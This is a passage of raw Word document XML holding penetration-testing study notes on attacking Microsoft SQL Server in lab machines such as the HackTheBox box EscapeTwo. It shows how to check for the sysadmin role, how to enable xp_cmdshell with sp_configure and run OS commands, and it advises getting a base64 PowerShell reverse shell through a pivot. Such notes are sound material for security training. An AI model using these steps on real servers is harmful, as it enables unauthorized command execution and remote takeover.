        <w:t xml:space="preserve">x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commands. Uppercase </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000197E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId517"/>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197F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The underlines part is the output of the "whoami" command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001980">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it doesn't work, that means XP_CMD shell is not enabled and we don't have permissions to enable it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001981">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to try enabling XP_CMD, you can add the flag "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-M enable_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001982">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001983">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to see what modules are in mssql:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001985">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, you will see "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql_priv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001986">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001987">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain authentication vs. Local Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001988">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain authentication: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The credentials are interpreted as DOMAIN\user, and the tool will try to authenticate using that context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001989">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Authentication: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The credentials are interpreted as local account on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o3swb7inbl7b" w:id="204"/>
      <w:bookmarkEnd w:id="204"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get command execution in mssql after you are sysadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw this in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-B .148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also saw this in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> EscapeTwo HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000198F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001990">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT is_srvrolemember('sysadmin');</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you get "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", then you are sysadmin and you can do anything. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001991">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001992">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One quick way to do it is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001993">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shown in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> EscapeTwo HTB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">official writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001995">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It does the SAME thing as the command below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001996">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001997">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to enable command execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001998">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'show advanced options', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'xp_cmdshell', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> EscapeTwo HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the second command would automatically get turned to 0 after a few seconds (probably a security feature), so make sure to run your commands fast!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Onlin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000199F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Example: run whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'whoami';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then get a reverse shell! But, from my experience in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .147 machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have to Base64 encode the rev shell. And it's best to use powershell, so we don't have to upload nc.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId518">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">revshells.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the powershell #3 (base64) payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in this case, we were in 10 subnet machines that couldn't access our kali (192 subnet), so we had to set up a listener on our ligolo pivot, and then send rev shell to pivot which is forwarded to our kali. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And here are some other things you can do:</w:t>
      </w:r>
    </w:p>
